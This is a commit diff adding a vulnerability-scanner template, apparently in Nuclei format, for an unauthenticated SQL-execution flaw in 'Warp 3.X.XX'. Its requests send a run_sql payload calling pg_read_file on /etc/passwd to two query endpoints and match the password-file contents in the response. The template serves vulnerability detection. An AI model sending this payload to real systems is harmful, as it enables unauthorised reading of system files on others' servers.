Create raw-psql-warp.yaml

vulnerabilities/other/raw-psql-warp.yaml

@@ -0,0 +1,55 @@
+id: raw-psql-warp
+
+info:
+  author: Udyz
+  name: Warp 3.X.XX - Unauthencation lead to psql query exec
+  severity: critical
+  reference:  
+  tags: sql,unauth,rce
+
+requests:
+  - raw:
+      - |
+        POST /v1/query HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "type": "bulk",
+          "source": "default",
+          "args":[
+            {
+              "type": "run_sql",
+              "args": {
+                "source":"default",
+                "sql":"SELECT pg_read_file('/etc/passwd',0,100000);",
+                "cascade": false,
+                "read_only": false
+              }
+            }
+          ]
+        }
+      - |
+        POST /v2/query HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {
+          "type": "bulk",
+          "source": "default",
+          "args":[
+            {
+              "type": "run_sql",
+              "args": {
+                "source":"default",
+                "sql":"SELECT pg_read_file('/etc/passwd',0,100000);",
+                "cascade": false,
+                "read_only": false
+              }
+            }
+          ]
+        }
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"